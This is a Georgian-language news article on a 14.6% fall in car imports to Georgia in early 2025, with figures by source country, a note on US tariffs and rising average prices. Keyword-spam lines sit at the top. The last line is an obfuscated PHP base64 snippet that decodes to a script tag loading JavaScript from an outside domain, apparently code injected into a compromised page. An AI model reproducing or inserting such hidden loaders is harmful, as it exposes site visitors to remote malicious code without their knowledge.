gorgia
ავერსი jaluzi

საქართველოში ავტომობილების იმპორტი 14.6%-ით შემცირდა. საქსტატის მონაცემებით, 2025 წლის პირველ სამ თვეში ქვეყანაში შემოვიდა 35 796 ერთეული ავტომობილი (სულ 622.2 მლნ დოლარზე მეტი ღირებულების). ეს კი მაშინ, როცა გასული წლის იანვარ-მარტში იმპორტირებული იყო 620.3 მილიონ დოლარზე მეტი ღირებულების 41 932 ერთეული მსუბუქი ავტომობილი.

საქართველოში ავტომობილების უდიდესი ნაწილის იმპორტი ამერიკიდან ხორციელდება. ასე მაგალითად, მხოლოდ მიმდინარე წლის იანვარ-მარტში ქვეყანაში ამერიკიდან 28 015 ერთეული მსუბუქი ავტომობილი შემოვიდა.

უფრო კონკრეტულად, 2025 წელს ავტომობილების იმპორტი შემდეგი 5 ძირითადი ბაზრიდან განხორციელდა:

აშშ - 28 015 ერთეული (351.9 მლნ აშშ დოლარის);
იაპონია - 2 882 (74.39 მლნ აშშ დოლარის);
გერმანია - 1 371 ერთეული (94.79 მლნ აშშ დოლარის);
ჩინეთი - 858 ერთეული (8.76 მლნ აშშ დოლარის);
კორეის რესპუბლიკა - 510 ერთეული (5.87 მლნ აშშ დოლარის).
აღსანიშნავია ისიც, რომ აპრილის დასაწყისში აშშ-ის პრეზიდენტმა დონალდ ტრამპმა ამერიკაში შეყვანილ ყველა ავტომობილზე 25%-იანი ტარიფები დააწესა. აღნიშნული ძალაში 3 მაისიდან შევა, ამ ფონზე არსებობს მოლოდინი, რომ მომავალ თვეებში ამერიკიდან ავტომობილების იმპორტი გაძვირდება.

აღსანიშნავია ისიც, რომ საქართველოს წელს ავტომობილების იმპორტი უკვე 17.5%-ით გაუძვირდა. უფრო კონკრეტულად, გასულ წელს 1 ავტომობილის საშუალო საიმპორტო ფასი გადასახადების გარეშე 14 793 დოლარს შეადგენდა, წელს კი ღირებულება 17 382 დოლარამდეა გაზრდილი. აღსანიშნავია ისიც, რომ ერთეული ავტომობილის ფასი ბრენდისა და ავტომობილის ტიპის მიხედვით შესაძლოა, ბევრად მეტი ან ნაკლები იყოს.

123
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");